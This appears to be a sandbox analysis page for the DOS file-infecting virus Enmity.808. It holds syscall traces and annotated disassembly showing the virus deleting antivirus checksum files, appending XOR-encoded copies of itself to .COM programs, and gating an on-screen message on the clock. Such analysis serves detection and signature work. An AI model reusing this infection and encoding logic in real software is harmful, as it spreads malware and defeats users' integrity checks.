Sample viewer

vx.netlux.org/Virus.DOS.Enmity.808


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:55:13.11991574Z 26 PC: 15189 | Set disk transfer address
2018-12-17T22:55:13.121365206Z 71 PC: 15193 | Get current directory
2018-12-17T22:55:13.12405755Z 67 PC: 153df | Get or set file attributes
2018-12-17T22:55:13.129588221Z 65 PC: 153e3 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-17T22:55:13.13566176Z 67 PC: 153df | Get or set file attributes
2018-12-17T22:55:13.141093074Z 65 PC: 153e3 | Delete file (Filename = 'CHKLIST.MS')
2018-12-17T22:55:13.151509459Z 67 PC: 153df | Get or set file attributes
2018-12-17T22:55:13.162093797Z 65 PC: 153e3 | Delete file (Filename = 'CHKLIST.CPS')
2018-12-17T22:55:13.17285757Z 67 PC: 153df | Get or set file attributes
2018-12-17T22:55:13.178358573Z 65 PC: 153e3 | Delete file (Filename = 'IVB.NTZ')
2018-12-17T22:55:13.184332496Z 78 PC: 1519b | Find first file
2018-12-17T22:55:13.190480909Z 67 PC: 1529d | Get or set file attributes
2018-12-17T22:55:13.20662499Z 61 PC: 152b2 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:55:13.22183564Z 63 PC: 152c7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:55:13.226062666Z 66 PC: 152ff | Move file pointer
2018-12-17T22:55:13.227006999Z 63 PC: 15316 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:55:13.229024598Z 44 PC: 1532a | Get time 0x1532a: mov word ptr [bp + 0x40a], dx
; Trace excerpt from the file-write path (16-bit real-mode DOS code, Intel operand order).
; The instruction at 0x1532a, shown on the preceding trace line, saves DX from the
; logged "Get time" call into [bp + 0x40a]; the loop at 0x15351 uses that word as its XOR key.
; The trace logs three consecutive writes after this point (21 + 752 + 35 bytes = 808),
; which matches the size in the sample name.
; NOTE(review): the key changes with the clock, so the 752 encoded bytes likely differ per
; infected file; a signature should rest on the bytes written unencoded — confirm against samples.
0x1532e: mov cx, 0x15                      ; CX = 21 bytes to write
0x15331: lea dx, word ptr [bp + 0x105]     ; DX = bp+0x105, written unencoded; 0x105 + 0x15 = 0x11a, where the encoded region starts
0x15335: pop ax                            ; function code is taken from the stack rather than from an immediate
0x15336: int 0x21                          ; logged by the trace as "Write 21 bytes on handle 5"
0x15338: push ax
0x15339: push bp
0x1533a: mov bp, sp                        ; temporary frame: [bp] = saved BP, [bp + 2] = the AX just pushed
0x1533c: mov word ptr [bp + 2], 0x4001     ; replace the pushed AX with 0x4001 (AH = 0x40 is the DOS write function)
0x15341: pop bp                            ; BP restored; 0x4001 stays on top of the stack, presumably for a later pop ax like the one at 0x15335
0x15342: mov cx, 0x178                     ; 0x178 = 376 words = 752 bytes
0x15345: mov dx, word ptr [bp + 0x40a]     ; DX = saved time word (the key); 0x11a + 0x2f0 = 0x40a, so it sits right after the source region
0x15349: lea si, word ptr [bp + 0x11a]     ; SI = source region
0x1534d: lea di, word ptr [bp + 0x4e2]     ; DI = destination buffer at bp+0x4e2
0x15351: lodsw ax, word ptr [si]           ; loop head: load one word
0x15352: xor ax, dx                        ; XOR it with the 16-bit key
0x15354: stosw word ptr es:[di], ax        ; store the encoded word
0x15355: loop 0x15351                      ; repeat CX times
0x15357: mov cx, 0x2f0                     ; CX = 752, the byte count of the second logged write
0x1535a: lea dx, word ptr [bp + 0x4e2]     ; DX = encoded copy; the excerpt ends before the call itself
2018-12-17T22:55:13.230934842Z 64 PC: 15338 | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:55:13.232845594Z 64 PC: 1536c | Write file or device (Write 752 bytes on handle 5)
2018-12-17T22:55:13.241275275Z 64 PC: 15376 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:55:13.244417768Z 66 PC: 15388 | Move file pointer
2018-12-17T22:55:13.24549Z 64 PC: 15392 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:55:13.250415556Z 87 PC: 153a7 | Get or set file date and time
2018-12-17T22:55:13.252077692Z 62 PC: 153ab | Close file
2018-12-17T22:55:13.258389443Z 67 PC: 153ba | Get or set file attributes
2018-12-17T22:55:13.262046341Z 79 PC: 1519b | Find next file
2018-12-17T22:55:13.264449736Z 79 PC: 1519b | Find next file
2018-12-17T22:55:13.266196779Z 67 PC: 1529d | Get or set file attributes
2018-12-17T22:55:13.272269918Z 61 PC: 152b2 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:55:13.284234212Z 63 PC: 152c7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:55:13.290445973Z 66 PC: 152ff | Move file pointer
2018-12-17T22:55:13.291634449Z 63 PC: 15316 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:55:13.294702778Z 44 PC: 1532a | Get time 0x1532a: mov word ptr [bp + 0x40a], dx
; Trace excerpt from the file-write path (16-bit real-mode DOS code, Intel operand order).
; The instruction at 0x1532a, shown on the preceding trace line, saves DX from the
; logged "Get time" call into [bp + 0x40a]; the loop at 0x15351 uses that word as its XOR key.
; The trace logs three consecutive writes after this point (21 + 752 + 35 bytes = 808),
; which matches the size in the sample name.
; NOTE(review): the key changes with the clock, so the 752 encoded bytes likely differ per
; infected file; a signature should rest on the bytes written unencoded — confirm against samples.
0x1532e: mov cx, 0x15                      ; CX = 21 bytes to write
0x15331: lea dx, word ptr [bp + 0x105]     ; DX = bp+0x105, written unencoded; 0x105 + 0x15 = 0x11a, where the encoded region starts
0x15335: pop ax                            ; function code is taken from the stack rather than from an immediate
0x15336: int 0x21                          ; logged by the trace as "Write 21 bytes on handle 5"
0x15338: push ax
0x15339: push bp
0x1533a: mov bp, sp                        ; temporary frame: [bp] = saved BP, [bp + 2] = the AX just pushed
0x1533c: mov word ptr [bp + 2], 0x4001     ; replace the pushed AX with 0x4001 (AH = 0x40 is the DOS write function)
0x15341: pop bp                            ; BP restored; 0x4001 stays on top of the stack, presumably for a later pop ax like the one at 0x15335
0x15342: mov cx, 0x178                     ; 0x178 = 376 words = 752 bytes
0x15345: mov dx, word ptr [bp + 0x40a]     ; DX = saved time word (the key); 0x11a + 0x2f0 = 0x40a, so it sits right after the source region
0x15349: lea si, word ptr [bp + 0x11a]     ; SI = source region
0x1534d: lea di, word ptr [bp + 0x4e2]     ; DI = destination buffer at bp+0x4e2
0x15351: lodsw ax, word ptr [si]           ; loop head: load one word
0x15352: xor ax, dx                        ; XOR it with the 16-bit key
0x15354: stosw word ptr es:[di], ax        ; store the encoded word
0x15355: loop 0x15351                      ; repeat CX times
0x15357: mov cx, 0x2f0                     ; CX = 752, the byte count of the second logged write
0x1535a: lea dx, word ptr [bp + 0x4e2]     ; DX = encoded copy; the excerpt ends before the call itself
2018-12-17T22:55:13.296815206Z 64 PC: 15338 | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:55:13.299661666Z 64 PC: 1536c | Write file or device (Write 752 bytes on handle 5)
2018-12-17T22:55:13.307581048Z 64 PC: 15376 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:55:13.311194108Z 66 PC: 15388 | Move file pointer
2018-12-17T22:55:13.312770056Z 64 PC: 15392 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:55:13.320176853Z 87 PC: 153a7 | Get or set file date and time
2018-12-17T22:55:13.322371321Z 62 PC: 153ab | Close file
2018-12-17T22:55:13.330624624Z 67 PC: 153ba | Get or set file attributes
2018-12-17T22:55:13.336284931Z 79 PC: 1519b | Find next file
2018-12-17T22:55:13.339903213Z 67 PC: 1529d | Get or set file attributes
2018-12-17T22:55:13.349675409Z 61 PC: 152b2 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:55:13.35682152Z 63 PC: 152c7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:55:13.363429575Z 66 PC: 152ff | Move file pointer
2018-12-17T22:55:13.364583326Z 63 PC: 15316 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:55:13.367199788Z 44 PC: 1532a | Get time 0x1532a: mov word ptr [bp + 0x40a], dx
; Trace excerpt from the file-write path (16-bit real-mode DOS code, Intel operand order).
; The instruction at 0x1532a, shown on the preceding trace line, saves DX from the
; logged "Get time" call into [bp + 0x40a]; the loop at 0x15351 uses that word as its XOR key.
; The trace logs three consecutive writes after this point (21 + 752 + 35 bytes = 808),
; which matches the size in the sample name.
; NOTE(review): the key changes with the clock, so the 752 encoded bytes likely differ per
; infected file; a signature should rest on the bytes written unencoded — confirm against samples.
0x1532e: mov cx, 0x15                      ; CX = 21 bytes to write
0x15331: lea dx, word ptr [bp + 0x105]     ; DX = bp+0x105, written unencoded; 0x105 + 0x15 = 0x11a, where the encoded region starts
0x15335: pop ax                            ; function code is taken from the stack rather than from an immediate
0x15336: int 0x21                          ; logged by the trace as "Write 21 bytes on handle 5"
0x15338: push ax
0x15339: push bp
0x1533a: mov bp, sp                        ; temporary frame: [bp] = saved BP, [bp + 2] = the AX just pushed
0x1533c: mov word ptr [bp + 2], 0x4001     ; replace the pushed AX with 0x4001 (AH = 0x40 is the DOS write function)
0x15341: pop bp                            ; BP restored; 0x4001 stays on top of the stack, presumably for a later pop ax like the one at 0x15335
0x15342: mov cx, 0x178                     ; 0x178 = 376 words = 752 bytes
0x15345: mov dx, word ptr [bp + 0x40a]     ; DX = saved time word (the key); 0x11a + 0x2f0 = 0x40a, so it sits right after the source region
0x15349: lea si, word ptr [bp + 0x11a]     ; SI = source region
0x1534d: lea di, word ptr [bp + 0x4e2]     ; DI = destination buffer at bp+0x4e2
0x15351: lodsw ax, word ptr [si]           ; loop head: load one word
0x15352: xor ax, dx                        ; XOR it with the 16-bit key
0x15354: stosw word ptr es:[di], ax        ; store the encoded word
0x15355: loop 0x15351                      ; repeat CX times
0x15357: mov cx, 0x2f0                     ; CX = 752, the byte count of the second logged write
0x1535a: lea dx, word ptr [bp + 0x4e2]     ; DX = encoded copy; the excerpt ends before the call itself
2018-12-17T22:55:13.369437566Z 64 PC: 15338 | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:55:13.37241135Z 64 PC: 1536c | Write file or device (Write 752 bytes on handle 5)
2018-12-17T22:55:13.3821169Z 64 PC: 15376 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:55:13.385668023Z 66 PC: 15388 | Move file pointer
2018-12-17T22:55:13.387430629Z 64 PC: 15392 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:55:13.394652658Z 87 PC: 153a7 | Get or set file date and time
2018-12-17T22:55:13.396375114Z 62 PC: 153ab | Close file
2018-12-17T22:55:13.403890083Z 67 PC: 153ba | Get or set file attributes
2018-12-17T22:55:13.408377493Z 79 PC: 1519b | Find next file
2018-12-17T22:55:13.411586238Z 67 PC: 1529d | Get or set file attributes
2018-12-17T22:55:13.422299419Z 61 PC: 152b2 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:55:13.429095232Z 63 PC: 152c7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:55:13.436181914Z 66 PC: 152ff | Move file pointer
2018-12-17T22:55:13.437460839Z 63 PC: 15316 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:55:13.439728729Z 44 PC: 1532a | Get time 0x1532a: mov word ptr [bp + 0x40a], dx
; Trace excerpt from the file-write path (16-bit real-mode DOS code, Intel operand order).
; The instruction at 0x1532a, shown on the preceding trace line, saves DX from the
; logged "Get time" call into [bp + 0x40a]; the loop at 0x15351 uses that word as its XOR key.
; The trace logs three consecutive writes after this point (21 + 752 + 35 bytes = 808),
; which matches the size in the sample name.
; NOTE(review): the key changes with the clock, so the 752 encoded bytes likely differ per
; infected file; a signature should rest on the bytes written unencoded — confirm against samples.
0x1532e: mov cx, 0x15                      ; CX = 21 bytes to write
0x15331: lea dx, word ptr [bp + 0x105]     ; DX = bp+0x105, written unencoded; 0x105 + 0x15 = 0x11a, where the encoded region starts
0x15335: pop ax                            ; function code is taken from the stack rather than from an immediate
0x15336: int 0x21                          ; logged by the trace as "Write 21 bytes on handle 5"
0x15338: push ax
0x15339: push bp
0x1533a: mov bp, sp                        ; temporary frame: [bp] = saved BP, [bp + 2] = the AX just pushed
0x1533c: mov word ptr [bp + 2], 0x4001     ; replace the pushed AX with 0x4001 (AH = 0x40 is the DOS write function)
0x15341: pop bp                            ; BP restored; 0x4001 stays on top of the stack, presumably for a later pop ax like the one at 0x15335
0x15342: mov cx, 0x178                     ; 0x178 = 376 words = 752 bytes
0x15345: mov dx, word ptr [bp + 0x40a]     ; DX = saved time word (the key); 0x11a + 0x2f0 = 0x40a, so it sits right after the source region
0x15349: lea si, word ptr [bp + 0x11a]     ; SI = source region
0x1534d: lea di, word ptr [bp + 0x4e2]     ; DI = destination buffer at bp+0x4e2
0x15351: lodsw ax, word ptr [si]           ; loop head: load one word
0x15352: xor ax, dx                        ; XOR it with the 16-bit key
0x15354: stosw word ptr es:[di], ax        ; store the encoded word
0x15355: loop 0x15351                      ; repeat CX times
0x15357: mov cx, 0x2f0                     ; CX = 752, the byte count of the second logged write
0x1535a: lea dx, word ptr [bp + 0x4e2]     ; DX = encoded copy; the excerpt ends before the call itself
2018-12-17T22:55:13.442232287Z 64 PC: 15338 | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:55:13.445866768Z 64 PC: 1536c | Write file or device (Write 752 bytes on handle 5)
2018-12-17T22:55:13.45377142Z 64 PC: 15376 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:55:13.456626028Z 66 PC: 15388 | Move file pointer
2018-12-17T22:55:13.457933889Z 64 PC: 15392 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:55:13.464156811Z 87 PC: 153a7 | Get or set file date and time
2018-12-17T22:55:13.465862277Z 62 PC: 153ab | Close file
2018-12-17T22:55:13.473298933Z 67 PC: 153ba | Get or set file attributes
2018-12-17T22:55:13.47769829Z 79 PC: 1519b | Find next file
2018-12-17T22:55:13.480934732Z 67 PC: 1529d | Get or set file attributes
2018-12-17T22:55:13.490297056Z 61 PC: 152b2 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:55:13.496966237Z 63 PC: 152c7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:55:13.503408798Z 66 PC: 152ff | Move file pointer
2018-12-17T22:55:13.504592885Z 63 PC: 15316 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:55:13.507515118Z 44 PC: 1532a | Get time 0x1532a: mov word ptr [bp + 0x40a], dx
; Trace excerpt from the file-write path (16-bit real-mode DOS code, Intel operand order).
; The instruction at 0x1532a, shown on the preceding trace line, saves DX from the
; logged "Get time" call into [bp + 0x40a]; the loop at 0x15351 uses that word as its XOR key.
; The trace logs three consecutive writes after this point (21 + 752 + 35 bytes = 808),
; which matches the size in the sample name.
; NOTE(review): the key changes with the clock, so the 752 encoded bytes likely differ per
; infected file; a signature should rest on the bytes written unencoded — confirm against samples.
0x1532e: mov cx, 0x15                      ; CX = 21 bytes to write
0x15331: lea dx, word ptr [bp + 0x105]     ; DX = bp+0x105, written unencoded; 0x105 + 0x15 = 0x11a, where the encoded region starts
0x15335: pop ax                            ; function code is taken from the stack rather than from an immediate
0x15336: int 0x21                          ; logged by the trace as "Write 21 bytes on handle 5"
0x15338: push ax
0x15339: push bp
0x1533a: mov bp, sp                        ; temporary frame: [bp] = saved BP, [bp + 2] = the AX just pushed
0x1533c: mov word ptr [bp + 2], 0x4001     ; replace the pushed AX with 0x4001 (AH = 0x40 is the DOS write function)
0x15341: pop bp                            ; BP restored; 0x4001 stays on top of the stack, presumably for a later pop ax like the one at 0x15335
0x15342: mov cx, 0x178                     ; 0x178 = 376 words = 752 bytes
0x15345: mov dx, word ptr [bp + 0x40a]     ; DX = saved time word (the key); 0x11a + 0x2f0 = 0x40a, so it sits right after the source region
0x15349: lea si, word ptr [bp + 0x11a]     ; SI = source region
0x1534d: lea di, word ptr [bp + 0x4e2]     ; DI = destination buffer at bp+0x4e2
0x15351: lodsw ax, word ptr [si]           ; loop head: load one word
0x15352: xor ax, dx                        ; XOR it with the 16-bit key
0x15354: stosw word ptr es:[di], ax        ; store the encoded word
0x15355: loop 0x15351                      ; repeat CX times
0x15357: mov cx, 0x2f0                     ; CX = 752, the byte count of the second logged write
0x1535a: lea dx, word ptr [bp + 0x4e2]     ; DX = encoded copy; the excerpt ends before the call itself
2018-12-17T22:55:13.509738579Z 64 PC: 15338 | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:55:13.512463947Z 64 PC: 1536c | Write file or device (Write 752 bytes on handle 5)
2018-12-17T22:55:13.520064848Z 64 PC: 15376 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:55:13.523328045Z 66 PC: 15388 | Move file pointer
2018-12-17T22:55:13.524932298Z 64 PC: 15392 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:55:13.531567304Z 87 PC: 153a7 | Get or set file date and time
2018-12-17T22:55:13.533611257Z 62 PC: 153ab | Close file
2018-12-17T22:55:13.541142042Z 67 PC: 153ba | Get or set file attributes
2018-12-17T22:55:13.545636147Z 79 PC: 1519b | Find next file
2018-12-17T22:55:13.54841601Z 67 PC: 1529d | Get or set file attributes
2018-12-17T22:55:13.55783107Z 61 PC: 152b2 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:55:13.56431513Z 63 PC: 152c7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:55:13.57369613Z 66 PC: 152ff | Move file pointer
2018-12-17T22:55:13.575231437Z 63 PC: 15316 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:55:13.577726809Z 44 PC: 1532a | Get time 0x1532a: mov word ptr [bp + 0x40a], dx
; Trace excerpt from the file-write path (16-bit real-mode DOS code, Intel operand order).
; The instruction at 0x1532a, shown on the preceding trace line, saves DX from the
; logged "Get time" call into [bp + 0x40a]; the loop at 0x15351 uses that word as its XOR key.
; The trace logs three consecutive writes after this point (21 + 752 + 35 bytes = 808),
; which matches the size in the sample name.
; NOTE(review): the key changes with the clock, so the 752 encoded bytes likely differ per
; infected file; a signature should rest on the bytes written unencoded — confirm against samples.
0x1532e: mov cx, 0x15                      ; CX = 21 bytes to write
0x15331: lea dx, word ptr [bp + 0x105]     ; DX = bp+0x105, written unencoded; 0x105 + 0x15 = 0x11a, where the encoded region starts
0x15335: pop ax                            ; function code is taken from the stack rather than from an immediate
0x15336: int 0x21                          ; logged by the trace as "Write 21 bytes on handle 5"
0x15338: push ax
0x15339: push bp
0x1533a: mov bp, sp                        ; temporary frame: [bp] = saved BP, [bp + 2] = the AX just pushed
0x1533c: mov word ptr [bp + 2], 0x4001     ; replace the pushed AX with 0x4001 (AH = 0x40 is the DOS write function)
0x15341: pop bp                            ; BP restored; 0x4001 stays on top of the stack, presumably for a later pop ax like the one at 0x15335
0x15342: mov cx, 0x178                     ; 0x178 = 376 words = 752 bytes
0x15345: mov dx, word ptr [bp + 0x40a]     ; DX = saved time word (the key); 0x11a + 0x2f0 = 0x40a, so it sits right after the source region
0x15349: lea si, word ptr [bp + 0x11a]     ; SI = source region
0x1534d: lea di, word ptr [bp + 0x4e2]     ; DI = destination buffer at bp+0x4e2
0x15351: lodsw ax, word ptr [si]           ; loop head: load one word
0x15352: xor ax, dx                        ; XOR it with the 16-bit key
0x15354: stosw word ptr es:[di], ax        ; store the encoded word
0x15355: loop 0x15351                      ; repeat CX times
0x15357: mov cx, 0x2f0                     ; CX = 752, the byte count of the second logged write
0x1535a: lea dx, word ptr [bp + 0x4e2]     ; DX = encoded copy; the excerpt ends before the call itself
2018-12-17T22:55:13.580579024Z 64 PC: 15338 | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:55:13.588949008Z 64 PC: 1536c | Write file or device (Write 752 bytes on handle 5)
2018-12-17T22:55:13.597450463Z 64 PC: 15376 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:55:13.601152705Z 66 PC: 15388 | Move file pointer
2018-12-17T22:55:13.602842777Z 64 PC: 15392 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:55:13.609913574Z 87 PC: 153a7 | Get or set file date and time
2018-12-17T22:55:13.612433265Z 62 PC: 153ab | Close file
2018-12-17T22:55:13.620379874Z 67 PC: 153ba | Get or set file attributes
2018-12-17T22:55:13.6253386Z 79 PC: 1519b | Find next file
2018-12-17T22:55:13.629097136Z 67 PC: 1529d | Get or set file attributes
2018-12-17T22:55:13.63982965Z 61 PC: 152b2 | Open file (Filename = 'PAH.COM')
2018-12-17T22:55:13.646630615Z 63 PC: 152c7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:55:13.654239729Z 66 PC: 152ff | Move file pointer
2018-12-17T22:55:13.655996187Z 63 PC: 15316 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:55:13.658348927Z 44 PC: 1532a | Get time 0x1532a: mov word ptr [bp + 0x40a], dx
; Trace excerpt from the file-write path (16-bit real-mode DOS code, Intel operand order).
; The instruction at 0x1532a, shown on the preceding trace line, saves DX from the
; logged "Get time" call into [bp + 0x40a]; the loop at 0x15351 uses that word as its XOR key.
; The trace logs three consecutive writes after this point (21 + 752 + 35 bytes = 808),
; which matches the size in the sample name.
; NOTE(review): the key changes with the clock, so the 752 encoded bytes likely differ per
; infected file; a signature should rest on the bytes written unencoded — confirm against samples.
0x1532e: mov cx, 0x15                      ; CX = 21 bytes to write
0x15331: lea dx, word ptr [bp + 0x105]     ; DX = bp+0x105, written unencoded; 0x105 + 0x15 = 0x11a, where the encoded region starts
0x15335: pop ax                            ; function code is taken from the stack rather than from an immediate
0x15336: int 0x21                          ; logged by the trace as "Write 21 bytes on handle 5"
0x15338: push ax
0x15339: push bp
0x1533a: mov bp, sp                        ; temporary frame: [bp] = saved BP, [bp + 2] = the AX just pushed
0x1533c: mov word ptr [bp + 2], 0x4001     ; replace the pushed AX with 0x4001 (AH = 0x40 is the DOS write function)
0x15341: pop bp                            ; BP restored; 0x4001 stays on top of the stack, presumably for a later pop ax like the one at 0x15335
0x15342: mov cx, 0x178                     ; 0x178 = 376 words = 752 bytes
0x15345: mov dx, word ptr [bp + 0x40a]     ; DX = saved time word (the key); 0x11a + 0x2f0 = 0x40a, so it sits right after the source region
0x15349: lea si, word ptr [bp + 0x11a]     ; SI = source region
0x1534d: lea di, word ptr [bp + 0x4e2]     ; DI = destination buffer at bp+0x4e2
0x15351: lodsw ax, word ptr [si]           ; loop head: load one word
0x15352: xor ax, dx                        ; XOR it with the 16-bit key
0x15354: stosw word ptr es:[di], ax        ; store the encoded word
0x15355: loop 0x15351                      ; repeat CX times
0x15357: mov cx, 0x2f0                     ; CX = 752, the byte count of the second logged write
0x1535a: lea dx, word ptr [bp + 0x4e2]     ; DX = encoded copy; the excerpt ends before the call itself
2018-12-17T22:55:13.661192402Z 64 PC: 15338 | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:55:13.665204481Z 64 PC: 1536c | Write file or device (Write 752 bytes on handle 5)
2018-12-17T22:55:13.673406245Z 64 PC: 15376 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:55:13.677084715Z 66 PC: 15388 | Move file pointer
2018-12-17T22:55:13.679112334Z 64 PC: 15392 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:55:13.685607701Z 87 PC: 153a7 | Get or set file date and time
2018-12-17T22:55:13.688005376Z 62 PC: 153ab | Close file
2018-12-17T22:55:13.695311956Z 67 PC: 153ba | Get or set file attributes
2018-12-17T22:55:13.698368179Z 79 PC: 1519b | Find next file
2018-12-17T22:55:13.700741049Z 67 PC: 1529d | Get or set file attributes
2018-12-17T22:55:13.70781111Z 61 PC: 152b2 | Open file (Filename = 'TEST.COM')
2018-12-17T22:55:13.715175353Z 63 PC: 152c7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:55:13.72245535Z 87 PC: 153a7 | Get or set file date and time
2018-12-17T22:55:13.723946574Z 62 PC: 153ab | Close file
2018-12-17T22:55:13.730890046Z 67 PC: 153ba | Get or set file attributes
2018-12-17T22:55:13.735731222Z 79 PC: 1519b | Find next file
2018-12-17T22:55:13.738242001Z 59 PC: 151ac | Change current directory
2018-12-17T22:55:13.742559895Z 71 PC: 151c9 | Get current directory
2018-12-17T22:55:13.745852368Z 59 PC: 151f3 | Change current directory
2018-12-17T22:55:13.756432477Z 59 PC: 1520e | Change current directory
2018-12-17T22:55:13.758433196Z 44 PC: 15212 | Get time 0x15212: cmp dx, 5
; Trace excerpt: time-gated on-screen message (16-bit real-mode code using BIOS INT 10h / INT 16h).
; The preceding trace line shows `cmp dx, 5` at 0x15212 directly after the logged "Get time"
; call, so the display below runs only when DX <= 5 (unsigned compare).  DOS Get time returns
; seconds in DH and hundredths in DL, i.e. the gate is seconds = 0 and hundredths <= 5.
; NOTE(review): the run record that follows this trace has "TimeBased":true, which suggests
; the sandbox varies the clock to reach this branch — confirm; BIOS calls are not in the syscall log.
0x15215: ja 0x15239                        ; DX > 5: skip the display entirely
0x15217: mov ax, 0xd                       ; AH = 0 (set video mode), AL = 0x0D (a graphics mode)
0x1521a: int 0x10
0x1521c: lea si, word ptr [bp + 0x3a4]     ; SI = start of the text to print
0x15220: cld                               ; forward string direction; also the loop head (target of the jmp at 0x1522e)
0x15221: lodsb al, byte ptr [si]           ; fetch the next character
0x15222: or al, al                         ; a zero byte terminates the text
0x15224: je 0x15230
0x15226: mov ah, 0xe                       ; BIOS teletype output of AL
0x15228: xor bh, bh                        ; display page 0
0x1522a: mov bl, 5                         ; foreground colour 5
0x1522c: int 0x10
0x1522e: jmp 0x15220
0x15230: xor ax, ax                        ; AH = 0: block until a key is pressed
0x15232: int 0x16
0x15234: mov ax, 3                         ; AH = 0, AL = 3: back to 80x25 text mode
0x15237: int 0x10
0x15239: push ax                           ; join point for the skip branch; the excerpt ends two instructions later
0x1523a: push bp
2018-12-17T22:55:13.760834654Z 26 PC: 15249 | Set disk transfer address
2018-12-17T22:55:13.763302331Z 9 PC: 12a51 | Display string (String= 'This is a sample! (10.000 bytes)')
2018-12-17T22:55:13.765832605Z 76 PC: 12a56 | Terminate with return code (Return code = '0')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":11814,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:31:23.48927502Z 26 PC: 15189 | Set disk transfer address
2018-12-25T12:31:23.490918872Z 71 PC: 15193 | Get current directory
2018-12-25T12:31:23.49354972Z 67 PC: 153df | Get or set file attributes
2018-12-25T12:31:23.498914633Z 65 PC: 153e3 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-25T12:31:23.510131637Z 67 PC: 153df | Get or set file attributes (See above)
2018-12-25T12:31:23.516104587Z 65 PC: 153e3 | Delete file (See above)
2018-12-25T12:31:23.521530338Z 67 PC: 153df | Get or set file attributes (See above)
2018-12-25T12:31:23.527308464Z 65 PC: 153e3 | Delete file (See above)
2018-12-25T12:31:23.532831728Z 67 PC: 153df | Get or set file attributes (See above)
2018-12-25T12:31:23.542855135Z 65 PC: 153e3 | Delete file (See above)
2018-12-25T12:31:23.553343199Z 78 PC: 1519b | Find first file
2018-12-25T12:31:23.564828077Z 67 PC: 1529d | Get or set file attributes
2018-12-25T12:31:23.580226442Z 61 PC: 152b2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:31:23.595004908Z 63 PC: 152c7 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T12:31:23.601416035Z 66 PC: 152ff | Move file pointer
2018-12-25T12:31:23.602847732Z 63 PC: 15316 | Read file or device (Read 7 bytes on handle 5)
2018-12-25T12:31:23.606049344Z 44 PC: 1532a | Get time 0x1532a: mov word ptr [bp + 0x40a], dx
; Trace excerpt from the file-write path (16-bit real-mode DOS code, Intel operand order).
; The instruction at 0x1532a, shown on the preceding trace line, saves DX from the
; logged "Get time" call into [bp + 0x40a]; the loop at 0x15351 uses that word as its XOR key.
; The trace logs three consecutive writes after this point (21 + 752 + 35 bytes = 808),
; which matches the size in the sample name.
; NOTE(review): the key changes with the clock, so the 752 encoded bytes likely differ per
; infected file; a signature should rest on the bytes written unencoded — confirm against samples.
0x1532e: mov cx, 0x15                      ; CX = 21 bytes to write
0x15331: lea dx, word ptr [bp + 0x105]     ; DX = bp+0x105, written unencoded; 0x105 + 0x15 = 0x11a, where the encoded region starts
0x15335: pop ax                            ; function code is taken from the stack rather than from an immediate
0x15336: int 0x21                          ; logged by the trace as "Write 21 bytes on handle 5"
0x15338: push ax
0x15339: push bp
0x1533a: mov bp, sp                        ; temporary frame: [bp] = saved BP, [bp + 2] = the AX just pushed
0x1533c: mov word ptr [bp + 2], 0x4001     ; replace the pushed AX with 0x4001 (AH = 0x40 is the DOS write function)
0x15341: pop bp                            ; BP restored; 0x4001 stays on top of the stack, presumably for a later pop ax like the one at 0x15335
0x15342: mov cx, 0x178                     ; 0x178 = 376 words = 752 bytes
0x15345: mov dx, word ptr [bp + 0x40a]     ; DX = saved time word (the key); 0x11a + 0x2f0 = 0x40a, so it sits right after the source region
0x15349: lea si, word ptr [bp + 0x11a]     ; SI = source region
0x1534d: lea di, word ptr [bp + 0x4e2]     ; DI = destination buffer at bp+0x4e2
0x15351: lodsw ax, word ptr [si]           ; loop head: load one word
0x15352: xor ax, dx                        ; XOR it with the 16-bit key
0x15354: stosw word ptr es:[di], ax        ; store the encoded word
0x15355: loop 0x15351                      ; repeat CX times
0x15357: mov cx, 0x2f0                     ; CX = 752, the byte count of the second logged write
0x1535a: lea dx, word ptr [bp + 0x4e2]     ; DX = encoded copy; the excerpt ends before the call itself
2018-12-25T12:31:23.608198462Z 64 PC: 15338 | Write file or device (Write 21 bytes on handle 5)
